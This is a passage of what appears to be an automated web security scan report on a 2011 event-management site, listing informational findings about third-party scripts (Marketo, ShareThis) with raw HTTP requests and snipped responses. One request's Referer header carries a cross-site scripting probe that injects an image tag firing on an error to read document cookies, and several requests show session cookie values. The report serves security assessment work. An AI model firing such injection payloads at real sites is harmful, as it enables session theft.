Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.9. http://www2.starcite.com/starcite/misc/reset.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/reset.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/misc/reset.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:49 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.10. http://www2.starcite.com/starcite/modules/meetingsmeetings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetingsmeetings.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/modules/meetingsmeetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.11. http://www2.starcite.com/starcite/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/news HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:14 GMT;path=/
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.12. http://www2.starcite.com/starcite/newsandevents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.13. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.14. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.15. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.16. http://www2.starcite.com/starcite/node/100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/100

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/node/100 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:48 GMT;path=/
Content-Length: 13694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.17. http://www2.starcite.com/starcite/node/335/445  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/335/445

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/node/335/445 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:30 GMT;path=/
Content-Length: 15012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<td width="239" align="right"><script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=1bce6fcf-d300-49d6-963d-c747256f2575&amp;headerbg=%231B9BA4&amp;inactivebg=%2312888C&amp;inactivefg=%23FFFFFF&amp;linkfg=%231B9BA4"></script>
...[SNIP]...

4.18. http://www2.starcite.com/starcite/node/929  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.19. http://www2.starcite.com/starcite/planners/findtherightsolution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...
</script><script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.20. http://www2.starcite.com/starcite/planners/howitworks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.21. http://www2.starcite.com/starcite/planners/meetings1-1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/meetings1-1

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/meetings1-1 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:10 GMT;path=/
Content-Length: 17018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.22. http://www2.starcite.com/starcite/planners/requestmoreinformation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.23. http://www2.starcite.com/starcite/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
